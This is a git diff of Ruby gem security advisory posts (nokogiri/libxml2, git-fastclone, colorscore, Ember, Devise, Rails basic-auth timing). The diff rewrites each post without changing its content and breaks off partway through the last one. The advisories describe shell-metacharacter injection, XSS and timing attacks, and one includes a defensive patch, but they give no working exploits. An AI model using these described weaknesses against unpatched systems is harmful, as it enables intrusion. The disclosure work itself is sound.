-    before 2.9.3 does not properly prevent entity expansion, which
-    allows context-dependent attackers to cause a denial of
-    service (CPU consumption) via crafted XML data, a different
-    vulnerability than CVE-2014-3660.
-
-    CVE-2015-7497
-    CVSS v2 Base Score: 5.0 (MEDIUM)
-    Heap-based buffer overflow in the xmlDictComputeFastQKey
-    function in dict.c in libxml2 before 2.9.3 allows
-    context-dependent attackers to cause a denial of service via
-    unspecified vectors.
-
-    CVE-2015-7498
-    CVSS v2 Base Score: 5.0 (MEDIUM)
-    Heap-based buffer overflow in the xmlParseXmlDecl function in
-    parser.c in libxml2 before 2.9.3 allows context-dependent
-    attackers to cause a denial of service via unspecified vectors
-    related to extracting errors after an encoding conversion
-    failure.
-
-    CVE-2015-7499
-    CVSS v2 Base Score: 5.0 (MEDIUM)
-    Heap-based buffer overflow in the xmlGROW function in parser.c
-    in libxml2 before 2.9.3 allows context-dependent attackers to
-    obtain sensitive process memory information via unspecified
-    vectors.
-
-    CVE-2015-7500
-    CVSS v2 Base Score: 5.0 (MEDIUM)
-    The xmlParseMisc function in parser.c in libxml2 before 2.9.3
-    allows context-dependent attackers to cause a denial of
-    service (out-of-bounds heap read) via unspecified vectors
-    related to incorrect entities boundaries and start tags.
-
-    CVE-2015-8241
-    CVSS v2 Base Score: 6.4 (MEDIUM)
-    The xmlNextChar function in libxml2 2.9.2 does not properly
-    check the state, which allows context-dependent attackers to
-    cause a denial of service (heap-based buffer over-read and
-    application crash) or obtain sensitive information via crafted
-    XML data.
-
-    CVE-2015-8242
-    CVSS v2 Base Score: 5.8 (MEDIUM)
-    The xmlSAX2TextNode function in SAX2.c in the push interface in
-    the HTML parser in libxml2 before 2.9.3 allows
-    context-dependent attackers to cause a denial of
-    service (stack-based buffer over-read and application crash) or
-    obtain sensitive information via crafted XML data.
-
-    CVE-2015-8317
-    CVSS v2 Base Score: 5.0 (MEDIUM)
-    The xmlParseXMLDecl function in parser.c in libxml2 before
-    2.9.3 allows context-dependent attackers to obtain sensitive
-    information via an (1) unterminated encoding value or (2)
-    incomplete XML declaration in XML data, which triggers an
-    out-of-bounds heap read.
-  cvss_v2: 7.1
-  unaffected_versions:
-  - "< 1.6.0"
-  patched_versions:
-  - ">= 1.6.7.1"
-  related:
-    cve:
-    - 2015-7497
-    - 2015-7498
-    - 2015-7499
-    - 2015-7500
-    - 2015-8241
-    - 2015-8242
-    - 2015-8317
-    url:
-    - https://github.com/sparklemotion/nokogiri/pull/1378
-    - https://github.com/sparklemotion/nokogiri/commit/4205af1a2a546f79d1b48df2ad8b27299c0099c5
----
+---
+layout: advisory
+title: 'CVE-2015-5312 (nokogiri): Nokogiri gem contains several vulnerabilities in
+  libxml2'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2015-5312
+  ghsa: xjqg-9jvg-fgx2
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/aSbgDiwb24s
+  title: Nokogiri gem contains several vulnerabilities in libxml2
+  date: 2015-12-15
+  description: |
+    Nokogiri version 1.6.7.1 has been released, pulling in several upstream
+    patches to the vendored libxml2 to address the following CVEs:
+
+    CVE-2015-5312
+    CVSS v2 Base Score: 7.1 (HIGH)
+    The xmlStringLenDecodeEntities function in parser.c in libxml2
+    before 2.9.3 does not properly prevent entity expansion, which
+    allows context-dependent attackers to cause a denial of
+    service (CPU consumption) via crafted XML data, a different
+    vulnerability than CVE-2014-3660.
+
+    CVE-2015-7497
+    CVSS v2 Base Score: 5.0 (MEDIUM)
+    Heap-based buffer overflow in the xmlDictComputeFastQKey
+    function in dict.c in libxml2 before 2.9.3 allows
+    context-dependent attackers to cause a denial of service via
+    unspecified vectors.
+
+    CVE-2015-7498
+    CVSS v2 Base Score: 5.0 (MEDIUM)
+    Heap-based buffer overflow in the xmlParseXmlDecl function in
+    parser.c in libxml2 before 2.9.3 allows context-dependent
+    attackers to cause a denial of service via unspecified vectors
+    related to extracting errors after an encoding conversion
+    failure.
+
+    CVE-2015-7499
+    CVSS v2 Base Score: 5.0 (MEDIUM)
+    Heap-based buffer overflow in the xmlGROW function in parser.c
+    in libxml2 before 2.9.3 allows context-dependent attackers to
+    obtain sensitive process memory information via unspecified
+    vectors.
+
+    CVE-2015-7500
+    CVSS v2 Base Score: 5.0 (MEDIUM)
+    The xmlParseMisc function in parser.c in libxml2 before 2.9.3
+    allows context-dependent attackers to cause a denial of
+    service (out-of-bounds heap read) via unspecified vectors
+    related to incorrect entities boundaries and start tags.
+
+    CVE-2015-8241
+    CVSS v2 Base Score: 6.4 (MEDIUM)
+    The xmlNextChar function in libxml2 2.9.2 does not properly
+    check the state, which allows context-dependent attackers to
+    cause a denial of service (heap-based buffer over-read and
+    application crash) or obtain sensitive information via crafted
+    XML data.
+
+    CVE-2015-8242
+    CVSS v2 Base Score: 5.8 (MEDIUM)
+    The xmlSAX2TextNode function in SAX2.c in the push interface in
+    the HTML parser in libxml2 before 2.9.3 allows
+    context-dependent attackers to cause a denial of
+    service (stack-based buffer over-read and application crash) or
+    obtain sensitive information via crafted XML data.
+
+    CVE-2015-8317
+    CVSS v2 Base Score: 5.0 (MEDIUM)
+    The xmlParseXMLDecl function in parser.c in libxml2 before
+    2.9.3 allows context-dependent attackers to obtain sensitive
+    information via an (1) unterminated encoding value or (2)
+    incomplete XML declaration in XML data, which triggers an
+    out-of-bounds heap read.
+  cvss_v2: 7.1
+  unaffected_versions:
+  - "< 1.6.0"
+  patched_versions:
+  - ">= 1.6.7.1"
+  related:
+    cve:
+    - 2015-7497
+    - 2015-7498
+    - 2015-7499
+    - 2015-7500
+    - 2015-8241
+    - 2015-8242
+    - 2015-8317
+    url:
+    - https://github.com/sparklemotion/nokogiri/pull/1378
+    - https://github.com/sparklemotion/nokogiri/commit/4205af1a2a546f79d1b48df2ad8b27299c0099c5
+---
diff --git a/advisories/_posts/2015-12-15-CVE-2015-8969.md b/advisories/_posts/2015-12-15-CVE-2015-8969.md
index 11e19900..4b70e992 100644
--- a/advisories/_posts/2015-12-15-CVE-2015-8969.md
+++ b/advisories/_posts/2015-12-15-CVE-2015-8969.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2015-8969 (git-fastclone): git-fastclone Shell Metacharacter Injection
-  Arbitrary Command Execution'
-comments: false
-categories:
-- git-fastclone
-advisory:
-  gem: git-fastclone
-  cve: 2015-8969
-  ghsa: mf6w-45cf-qhmp
-  url: https://hackerone.com/reports/105190
-  title: git-fastclone Shell Metacharacter Injection Arbitrary Command Execution
-  date: 2015-12-15
-  description: |
-    git-fastclone before 1.0.5 passes user modifiable strings directly to a shell
-    command. An attacker can execute malicious commands by modifying the strings
-    that are passed as arguments to "cd " and "git clone " commands in the
-    library.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.0.5"
----
+---
+layout: advisory
+title: 'CVE-2015-8969 (git-fastclone): git-fastclone Shell Metacharacter Injection
+  Arbitrary Command Execution'
+comments: false
+categories:
+- git-fastclone
+advisory:
+  gem: git-fastclone
+  cve: 2015-8969
+  ghsa: mf6w-45cf-qhmp
+  url: https://hackerone.com/reports/105190
+  title: git-fastclone Shell Metacharacter Injection Arbitrary Command Execution
+  date: 2015-12-15
+  description: |
+    git-fastclone before 1.0.5 passes user modifiable strings directly to a shell
+    command. An attacker can execute malicious commands by modifying the strings
+    that are passed as arguments to "cd " and "git clone " commands in the
+    library.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.0.5"
+---
diff --git a/advisories/_posts/2015-12-18-OSVDB-132234.md b/advisories/_posts/2015-12-18-OSVDB-132234.md
index e1ee2e85..8e9ec149 100644
--- a/advisories/_posts/2015-12-18-OSVDB-132234.md
+++ b/advisories/_posts/2015-12-18-OSVDB-132234.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'OSVDB-132234 (rack-attack): rack-attack Gem for Ruby missing normalization
-  before request path processing'
-comments: false
-categories:
-- rack-attack
-advisory:
-  gem: rack-attack
-  osvdb: 132234
-  url: https://github.com/kickstarter/rack-attack/releases/tag/v4.3.1
-  title: rack-attack Gem for Ruby missing normalization before request path processing
-  date: 2015-12-18
-  description: |
-    When using rack-attack with a rails app, developers expect the request
-    path to be normalized. In particular, trailing slashes are stripped so
-    a request path "/login/" becomes "/login" by the time you're in
-    ActionController.
-
-    Since Rack::Attack runs before ActionDispatch, the request path is not
-    yet normalized. This can cause throttles and blacklists to not work as
-    expected.
-
-    E.g., a throttle:
-
-    `throttle('logins', ...) {|req| req.path == "/login" }`
-
-    would not match a request to '/login/', though Rails would route
-    '/login/' to the same '/login' action.
-  patched_versions:
-  - ">= 4.3.1"
-  related:
-    url:
-    - https://github.com/kickstarter/rack-attack/releases/tag/v4.3.1
-    - https://github.com/rack/rack-attack/commit/76c2e3143099d938883ae5654527b47e9e6a8977
-    - https://security.snyk.io/vuln/SNYK-RUBY-RACKATTACK-20246
-    - https://github.com/rack/rack-attack/blob/main/CHANGELOG.md
----
+---
+layout: advisory
+title: 'OSVDB-132234 (rack-attack): rack-attack Gem for Ruby missing normalization
+  before request path processing'
+comments: false
+categories:
+- rack-attack
+advisory:
+  gem: rack-attack
+  osvdb: 132234
+  url: https://github.com/kickstarter/rack-attack/releases/tag/v4.3.1
+  title: rack-attack Gem for Ruby missing normalization before request path processing
+  date: 2015-12-18
+  description: |
+    When using rack-attack with a rails app, developers expect the request
+    path to be normalized. In particular, trailing slashes are stripped so
+    a request path "/login/" becomes "/login" by the time you're in
+    ActionController.
+
+    Since Rack::Attack runs before ActionDispatch, the request path is not
+    yet normalized. This can cause throttles and blacklists to not work as
+    expected.
+
+    E.g., a throttle:
+
+    `throttle('logins', ...) {|req| req.path == "/login" }`
+
+    would not match a request to '/login/', though Rails would route
+    '/login/' to the same '/login' action.
+  patched_versions:
+  - ">= 4.3.1"
+  related:
+    url:
+    - https://github.com/kickstarter/rack-attack/releases/tag/v4.3.1
+    - https://github.com/rack/rack-attack/commit/76c2e3143099d938883ae5654527b47e9e6a8977
+    - https://security.snyk.io/vuln/SNYK-RUBY-RACKATTACK-20246
+    - https://github.com/rack/rack-attack/blob/main/CHANGELOG.md
+---
diff --git a/advisories/_posts/2016-01-04-CVE-2015-7541.md b/advisories/_posts/2016-01-04-CVE-2015-7541.md
index e2290ad2..1388a3f5 100644
--- a/advisories/_posts/2016-01-04-CVE-2015-7541.md
+++ b/advisories/_posts/2016-01-04-CVE-2015-7541.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2015-7541 (colorscore): colorscore Gem for Ruby lib/colorscore/histogram.rb
-  Arbitrary Command Injection'
-comments: false
-categories:
-- colorscore
-advisory:
-  gem: colorscore
-  cve: 2015-7541
-  osvdb: 132516
-  ghsa: 73qw-ww62-m54x
-  url: http://seclists.org/oss-sec/2016/q1/17
-  title: colorscore Gem for Ruby lib/colorscore/histogram.rb Arbitrary Command Injection
-  date: 2016-01-04
-  description: |
-    The contents of the `image_path`, `colors`, and `depth` variables generated
-    from possibly user-supplied input are passed directly to the shell via
-    `convert ...`.
-
-    If a user supplies a value that includes shell metacharacters such as ';', an
-    attacker may be able to execute shell commands on the remote system as the
-    user id of the Ruby process.
-
-    To resolve this issue, the aforementioned variables (especially `image_path`)
-    must be sanitized for shell metacharacters.
-  cvss_v3: 10.0
-  patched_versions:
-  - ">= 0.0.5"
----
+---
+layout: advisory
+title: 'CVE-2015-7541 (colorscore): colorscore Gem for Ruby lib/colorscore/histogram.rb
+  Arbitrary Command Injection'
+comments: false
+categories:
+- colorscore
+advisory:
+  gem: colorscore
+  cve: 2015-7541
+  osvdb: 132516
+  ghsa: 73qw-ww62-m54x
+  url: http://seclists.org/oss-sec/2016/q1/17
+  title: colorscore Gem for Ruby lib/colorscore/histogram.rb Arbitrary Command Injection
+  date: 2016-01-04
+  description: |
+    The contents of the `image_path`, `colors`, and `depth` variables generated
+    from possibly user-supplied input are passed directly to the shell via
+    `convert ...`.
+
+    If a user supplies a value that includes shell metacharacters such as ';', an
+    attacker may be able to execute shell commands on the remote system as the
+    user id of the Ruby process.
+
+    To resolve this issue, the aforementioned variables (especially `image_path`)
+    must be sanitized for shell metacharacters.
+  cvss_v3: 10.0
+  patched_versions:
+  - ">= 0.0.5"
+---
diff --git a/advisories/_posts/2016-01-08-OSVDB-132800.md b/advisories/_posts/2016-01-08-OSVDB-132800.md
index 3c84d5b6..e45e9720 100644
--- a/advisories/_posts/2016-01-08-OSVDB-132800.md
+++ b/advisories/_posts/2016-01-08-OSVDB-132800.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'OSVDB-132800 (auto_select2): auto_select2 Gem for Ruby allows arbitrary search
-  execution'
-comments: false
-categories:
-- auto_select2
-advisory:
-  gem: auto_select2
-  osvdb: 132800
-  url: https://www.openwall.com/lists/oss-security/2016/01/11/2
-  title: auto_select2 Gem for Ruby allows arbitrary search execution
-  date: 2016-01-08
-  description: |
-    auto_select2 Gem for Ruby contains a flaw that is triggered
-    when handling the 'params[:default_class_name]' option. This
-    allows users to search any object of all given ActiveRecord classes.
-  patched_versions:
-  - ">= 0.5.0"
-  related:
-    url:
-    - https://www.openwall.com/lists/oss-security/2016/01/11/2
-    - https://github.com/Loriowar/auto_select2/issues/4
-    - https://github.com/bkocherov/auto_select2/commit/c283ba5b2ad828c3b7414565ae66cd0d86f5a5df
-    - https://github.com/rubysec/ruby-advisory-db/issues/224
-    - https://github.com/rubysec/ruby-advisory-db/pull/227
-    - https://github.com/Tab10id/auto_awesomplete/issues/2
----
+---
+layout: advisory
+title: 'OSVDB-132800 (auto_select2): auto_select2 Gem for Ruby allows arbitrary search
+  execution'
+comments: false
+categories:
+- auto_select2
+advisory:
+  gem: auto_select2
+  osvdb: 132800
+  url: https://www.openwall.com/lists/oss-security/2016/01/11/2
+  title: auto_select2 Gem for Ruby allows arbitrary search execution
+  date: 2016-01-08
+  description: |
+    auto_select2 Gem for Ruby contains a flaw that is triggered
+    when handling the 'params[:default_class_name]' option. This
+    allows users to search any object of all given ActiveRecord classes.
+  patched_versions:
+  - ">= 0.5.0"
+  related:
+    url:
+    - https://www.openwall.com/lists/oss-security/2016/01/11/2
+    - https://github.com/Loriowar/auto_select2/issues/4
+    - https://github.com/bkocherov/auto_select2/commit/c283ba5b2ad828c3b7414565ae66cd0d86f5a5df
+    - https://github.com/rubysec/ruby-advisory-db/issues/224
+    - https://github.com/rubysec/ruby-advisory-db/pull/227
+    - https://github.com/Tab10id/auto_awesomplete/issues/2
+---
diff --git a/advisories/_posts/2016-01-12-CVE-2017-1000043.md b/advisories/_posts/2016-01-12-CVE-2017-1000043.md
index 79c4e866..d2d07a6c 100644
--- a/advisories/_posts/2016-01-12-CVE-2017-1000043.md
+++ b/advisories/_posts/2016-01-12-CVE-2017-1000043.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2017-1000043 (mapbox-rails): mapbox-rails Content Injection via TileJSON
-  Name'
-comments: false
-categories:
-- mapbox-rails
-advisory:
-  gem: mapbox-rails
-  cve: 2017-1000043
-  osvdb: 132871
-  ghsa: q69p-5h74-w36f
-  url: https://nvd.nist.gov/vuln/detail/CVE-2017-1000043
-  title: mapbox-rails Content Injection via TileJSON Name
-  date: 2016-01-12
-  description: |
-    Mapbox.js versions 1.x prior to 1.6.6 and 2.x prior to 2.2.4 are vulnerable
-    to a cross-site-scripting attack in certain uncommon usage scenarios.
-
-    If you use L.mapbox.map and L.mapbox.shareControl it is possible for a
-    malicious user with control over the TileJSON content to inject script
-    content into the name value of the TileJSON. After clicking on the share
-    control, the malicious code will execute in the context of the page using
-    Mapbox.js.
-
-    Such usage is uncommon. L.mapbox.shareControl is not automatically added to
-    Mapbox.js maps and must be explicitly added. The following usage scenarios
-    are not vulnerable:
-
-    * the map does not use a share control (L.mapbox.sharecontrol)
-    * only trusted TileJSON content is loaded
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 1.6.6"
-  - ">= 2.2.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000043
-    - https://nodesecurity.io/advisories/74
-    - https://hackerone.com/reports/99245
-    - https://github.com/advisories/GHSA-q69p-5h74-w36f
----
+---
+layout: advisory
+title: 'CVE-2017-1000043 (mapbox-rails): mapbox-rails Content Injection via TileJSON
+  Name'
+comments: false
+categories:
+- mapbox-rails
+advisory:
+  gem: mapbox-rails
+  cve: 2017-1000043
+  osvdb: 132871
+  ghsa: q69p-5h74-w36f
+  url: https://nvd.nist.gov/vuln/detail/CVE-2017-1000043
+  title: mapbox-rails Content Injection via TileJSON Name
+  date: 2016-01-12
+  description: |
+    Mapbox.js versions 1.x prior to 1.6.6 and 2.x prior to 2.2.4 are vulnerable
+    to a cross-site-scripting attack in certain uncommon usage scenarios.
+
+    If you use L.mapbox.map and L.mapbox.shareControl it is possible for a
+    malicious user with control over the TileJSON content to inject script
+    content into the name value of the TileJSON. After clicking on the share
+    control, the malicious code will execute in the context of the page using
+    Mapbox.js.
+
+    Such usage is uncommon. L.mapbox.shareControl is not automatically added to
+    Mapbox.js maps and must be explicitly added. The following usage scenarios
+    are not vulnerable:
+
+    * the map does not use a share control (L.mapbox.sharecontrol)
+    * only trusted TileJSON content is loaded
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 1.6.6"
+  - ">= 2.2.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000043
+    - https://nodesecurity.io/advisories/74
+    - https://hackerone.com/reports/99245
+    - https://github.com/advisories/GHSA-q69p-5h74-w36f
+---
diff --git a/advisories/_posts/2016-01-14-CVE-2015-7565.md b/advisories/_posts/2016-01-14-CVE-2015-7565.md
index 6d48a0ce..3b7283e8 100644
--- a/advisories/_posts/2016-01-14-CVE-2015-7565.md
+++ b/advisories/_posts/2016-01-14-CVE-2015-7565.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2015-7565 (ember-source): Ember.js XSS Vulnerability with User-Supplied
-  JSON'
-comments: false
-categories:
-- ember-source
-advisory:
-  gem: ember-source
-  cve: 2015-7565
-  ghsa: m3q7-rj8g-m457
-  url: https://groups.google.com/forum/#!topic/ember-security/OfyQkoSuppY
-  title: Ember.js XSS Vulnerability with User-Supplied JSON
-  date: 2016-01-14
-  description: |
-    By default, Ember will escape any values in Handlebars templates that
-    use double curlies (`{{value}}`). Developers can specifically opt out of
-    this escaping behavior by passing an instance of `SafeString` rather
-    than a raw string, which tells Ember that it should not escape the
-    string because the developer has taken responsibility for escapement.
-
-    It is possible for an attacker to create a specially-crafted payload
-    that causes a non-sanitized string to be treated as a `SafeString`, and
-    thus bypass Ember's normal escaping behavior. This could allow an
-    attacker to execute arbitrary JavaScript in the context of the current
-    domain ("XSS").
-
-    All users running an affected release should either upgrade or use of
-    the workarounds immediately.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 1.8.0"
-  patched_versions:
-  - "~> 1.11.4"
-  - "~> 1.12.2"
-  - "~> 1.13.12"
-  - "~> 2.0.3"
-  - "~> 2.1.2"
-  - ">= 2.2.1"
----
+---
+layout: advisory
+title: 'CVE-2015-7565 (ember-source): Ember.js XSS Vulnerability with User-Supplied
+  JSON'
+comments: false
+categories:
+- ember-source
+advisory:
+  gem: ember-source
+  cve: 2015-7565
+  ghsa: m3q7-rj8g-m457
+  url: https://groups.google.com/forum/#!topic/ember-security/OfyQkoSuppY
+  title: Ember.js XSS Vulnerability with User-Supplied JSON
+  date: 2016-01-14
+  description: |
+    By default, Ember will escape any values in Handlebars templates that
+    use double curlies (`{{value}}`). Developers can specifically opt out of
+    this escaping behavior by passing an instance of `SafeString` rather
+    than a raw string, which tells Ember that it should not escape the
+    string because the developer has taken responsibility for escapement.
+
+    It is possible for an attacker to create a specially-crafted payload
+    that causes a non-sanitized string to be treated as a `SafeString`, and
+    thus bypass Ember's normal escaping behavior. This could allow an
+    attacker to execute arbitrary JavaScript in the context of the current
+    domain ("XSS").
+
+    All users running an affected release should either upgrade or use of
+    the workarounds immediately.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 1.8.0"
+  patched_versions:
+  - "~> 1.11.4"
+  - "~> 1.12.2"
+  - "~> 1.13.12"
+  - "~> 2.0.3"
+  - "~> 2.1.2"
+  - ">= 2.2.1"
+---
diff --git a/advisories/_posts/2016-01-18-CVE-2015-8314.md b/advisories/_posts/2016-01-18-CVE-2015-8314.md
index 28d5c359..7c2970b0 100644
--- a/advisories/_posts/2016-01-18-CVE-2015-8314.md
+++ b/advisories/_posts/2016-01-18-CVE-2015-8314.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2015-8314 (devise): Devise Gem for Ruby Unauthorized Access Using Remember
-  Me Cookie'
-comments: false
-categories:
-- devise
-advisory:
-  gem: devise
-  cve: 2015-8314
-  ghsa: 746g-3gfp-hfhw
-  url: http://blog.plataformatec.com.br/2016/01/improve-remember-me-cookie-expiration-in-devise/
-  title: Devise Gem for Ruby Unauthorized Access Using Remember Me Cookie
-  date: 2016-01-18
-  description: |
-    Devise version before 3.5.4 uses cookies to implement a "Remember me"
-    functionality. However, it generates the same cookie for all devices. If an
-    attacker manages to steal a remember me cookie and the user does not change
-    the password frequently, the cookie can be used to gain access to the
-    application indefinitely.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 3.5.4"
----
+---
+layout: advisory
+title: 'CVE-2015-8314 (devise): Devise Gem for Ruby Unauthorized Access Using Remember
+  Me Cookie'
+comments: false
+categories:
+- devise
+advisory:
+  gem: devise
+  cve: 2015-8314
+  ghsa: 746g-3gfp-hfhw
+  url: http://blog.plataformatec.com.br/2016/01/improve-remember-me-cookie-expiration-in-devise/
+  title: Devise Gem for Ruby Unauthorized Access Using Remember Me Cookie
+  date: 2016-01-18
+  description: |
+    Devise version before 3.5.4 uses cookies to implement a "Remember me"
+    functionality. However, it generates the same cookie for all devices. If an
+    attacker manages to steal a remember me cookie and the user does not change
+    the password frequently, the cookie can be used to gain access to the
+    application indefinitely.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 3.5.4"
+---
diff --git a/advisories/_posts/2016-01-19-CVE-2015-7499.md b/advisories/_posts/2016-01-19-CVE-2015-7499.md
index bc060a2b..c051eede 100644
--- a/advisories/_posts/2016-01-19-CVE-2015-7499.md
+++ b/advisories/_posts/2016-01-19-CVE-2015-7499.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2015-7499 (nokogiri): Nokogiri gem contains a heap-based buffer overflow
-  vulnerability in libxml2'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2015-7499
-  ghsa: jxjr-5h69-qw3w
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/Dy7YiKb_pMM
-  title: Nokogiri gem contains a heap-based buffer overflow vulnerability in libxml2
-  date: 2016-01-19
-  description: |
-    Nokogiri version 1.6.7.2 has been released, pulling in several upstream
-    patches to the vendored libxml2 to address the following CVE:
-
-    CVE-2015-7499
-    CVSS v2 Base Score: 5.0 (MEDIUM)
-
-    Heap-based buffer overflow in the xmlGROW function in parser.c
-    in libxml2 before 2.9.3 allows context-dependent attackers to
-    obtain sensitive process memory information via unspecified
-    vectors.
-
-    libxml2 could be made to crash if it opened a specially crafted
-    file. It was discovered that libxml2 incorrectly handled certain
-    malformed documents. If a user or automated system were tricked
-    into opening a specially crafted document, an attacker could
-    possibly cause libxml2 to crash, resulting in a denial of service.
-  cvss_v2: 5.0
-  unaffected_versions:
-  - "< 1.6.0"
-  patched_versions:
-  - ">= 1.6.7.2"
-  related:
-    url:
-    - https://github.com/sparklemotion/nokogiri/commit/9eb540e7c905924a42757bf0a34c2c00707d536c
----
+---
+layout: advisory
+title: 'CVE-2015-7499 (nokogiri): Nokogiri gem contains a heap-based buffer overflow
+  vulnerability in libxml2'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2015-7499
+  ghsa: jxjr-5h69-qw3w
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/Dy7YiKb_pMM
+  title: Nokogiri gem contains a heap-based buffer overflow vulnerability in libxml2
+  date: 2016-01-19
+  description: |
+    Nokogiri version 1.6.7.2 has been released, pulling in several upstream
+    patches to the vendored libxml2 to address the following CVE:
+
+    CVE-2015-7499
+    CVSS v2 Base Score: 5.0 (MEDIUM)
+
+    Heap-based buffer overflow in the xmlGROW function in parser.c
+    in libxml2 before 2.9.3 allows context-dependent attackers to
+    obtain sensitive process memory information via unspecified
+    vectors.
+
+    libxml2 could be made to crash if it opened a specially crafted
+    file. It was discovered that libxml2 incorrectly handled certain
+    malformed documents. If a user or automated system were tricked
+    into opening a specially crafted document, an attacker could
+    possibly cause libxml2 to crash, resulting in a denial of service.
+  cvss_v2: 5.0
+  unaffected_versions:
+  - "< 1.6.0"
+  patched_versions:
+  - ">= 1.6.7.2"
+  related:
+    url:
+    - https://github.com/sparklemotion/nokogiri/commit/9eb540e7c905924a42757bf0a34c2c00707d536c
+---
diff --git a/advisories/_posts/2016-01-25-CVE-2015-7576.md b/advisories/_posts/2016-01-25-CVE-2015-7576.md
index 92d721f5..f6ac98f2 100644
--- a/advisories/_posts/2016-01-25-CVE-2015-7576.md
+++ b/advisories/_posts/2016-01-25-CVE-2015-7576.md
@@ -1,125 +1,125 @@
----
-layout: advisory
-title: 'CVE-2015-7576 (actionpack): Timing attack vulnerability in basic authentication
-  in Action Controller.'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2015-7576
-  ghsa: p692-7mm3-3fxg
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/ANv0HDHEC3k
-  title: Timing attack vulnerability in basic authentication in Action Controller.
-  date: 2016-01-25
-  description: |
-    There is a timing attack vulnerability in the basic authentication support
-    in Action Controller. This vulnerability has been assigned the CVE
-    identifier CVE-2015-7576.
-
-    Versions Affected:  All.
-    Not affected:       None.
-    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1
-
-    Impact
-    ------
-    Due to the way that Action Controller compares user names and passwords in
-    basic authentication authorization code, it is possible for an attacker to
-    analyze the time taken by a response and intuit the password.
-
-    For example, this string comparison:
-
-      "foo" == "bar"
-
-    is possibly faster than this comparison:
-
-      "foo" == "fo1"
-
-    Attackers can use this information to attempt to guess the username and
-    password used in the basic authentication system.
-
-    You can tell you application is vulnerable to this attack by looking for
-    `http_basic_authenticate_with` method calls in your application.
-
-    All users running an affected release should either upgrade or use one of
-    the workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    If you can't upgrade, please use the following monkey patch in an initializer
-    that is loaded before your application:
-
-    ```
-    $ cat config/initializers/basic_auth_fix.rb
-    module ActiveSupport
-      module SecurityUtils
-        def secure_compare(a, b)
-          return false unless a.bytesize == b.bytesize
-
-          l = a.unpack "C#{a.bytesize}"
-
-          res = 0
-          b.each_byte { |byte| res |= byte ^ l.shift }
-          res == 0
-        end
-        module_function :secure_compare
-
-        def variable_size_secure_compare(a, b)
-          secure_compare(::Digest::SHA256.hexdigest(a), ::Digest::SHA256.hexdigest(b))
-        end
-        module_function :variable_size_secure_compare
-      end
-    end
-
-    module ActionController
-      class Base
-        def self.http_basic_authenticate_with(options = {})
-          before_action(options.except(:name, :password, :realm)) do
-            authenticate_or_request_with_http_basic(options[:realm] || "Application") do |name, password|
-              # This comparison uses & so that it doesn't short circuit and
-              # uses `variable_size_secure_compare` so that length information
-              # isn't leaked.
-              ActiveSupport::SecurityUtils.variable_size_secure_compare(name, options[:name]) &
-                ActiveSupport::SecurityUtils.variable_size_secure_compare(password, options[:password])
-            end
-          end
-        end
-      end
-    end
-    ```
-
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches for
-    the two supported release series. They are in git-am format and consist of a
-    single changeset.
-
-    * 4-1-basic_auth.patch - Patch for 4.1 series
-    * 4-2-basic_auth.patch - Patch for 4.2 series
-    * 5-0-basic_auth.patch - Patch for 5.0 series
-
-    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
-    of earlier unsupported releases are advised to upgrade as soon as possible as we
-    cannot guarantee the continued availability of security fixes for unsupported
-    releases.
-
-    Credits
-    -------
-
-    Thank you to Daniel Waterworth for reporting the problem and working with us to
-    fix it.
-  cvss_v2: 4.3
-  cvss_v3: 3.7
-  patched_versions:
-  - ">= 5.0.0.beta1.1"
-  - "~> 4.2.5, >= 4.2.5.1"
-  - "~> 4.1.14, >= 4.1.14.1"
-  - "~> 3.2.22.1"
----
+---
+layout: advisory
+title: 'CVE-2015-7576 (actionpack): Timing attack vulnerability in basic authentication
+  in Action Controller.'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2015-7576
+  ghsa: p692-7mm3-3fxg
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/ANv0HDHEC3k
+  title: Timing attack vulnerability in basic authentication in Action Controller.
+  date: 2016-01-25
+  description: |
+    There is a timing attack vulnerability in the basic authentication support
+    in Action Controller. This vulnerability has been assigned the CVE
+    identifier CVE-2015-7576.
+
+    Versions Affected:  All.
+    Not affected:       None.
+    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1
+
+    Impact
+    ------
+    Due to the way that Action Controller compares user names and passwords in
+    basic authentication authorization code, it is possible for an attacker to
+    analyze the time taken by a response and intuit the password.
+
+    For example, this string comparison:
+
+      "foo" == "bar"
+
+    is possibly faster than this comparison:
+
+      "foo" == "fo1"
+
+    Attackers can use this information to attempt to guess the username and
